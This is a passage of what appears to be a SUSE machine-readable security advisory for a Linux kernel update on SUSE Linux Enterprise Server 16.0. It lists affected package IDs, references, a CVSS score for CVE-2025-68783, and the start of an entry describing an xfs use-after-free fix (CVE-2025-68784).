"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68783",
"url": "https://www.suse.com/security/cve/CVE-2025-68783"
},
{
"category": "external",
"summary": "SUSE Bug 1256650 for CVE-2025-68783",
"url": "https://bugzilla.suse.com/1256650"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68783"
},
{
"cve": "CVE-2025-68784",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68784"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nxfs: fix a UAF problem in xattr repair\n\nThe xchk_setup_xattr_buf function can allocate a new value buffer, which\nmeans that any reference to ab-\u003evalue before the call could become a\ndangling pointer. Fix this by moving an assignment to after the buffer\nsetup.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
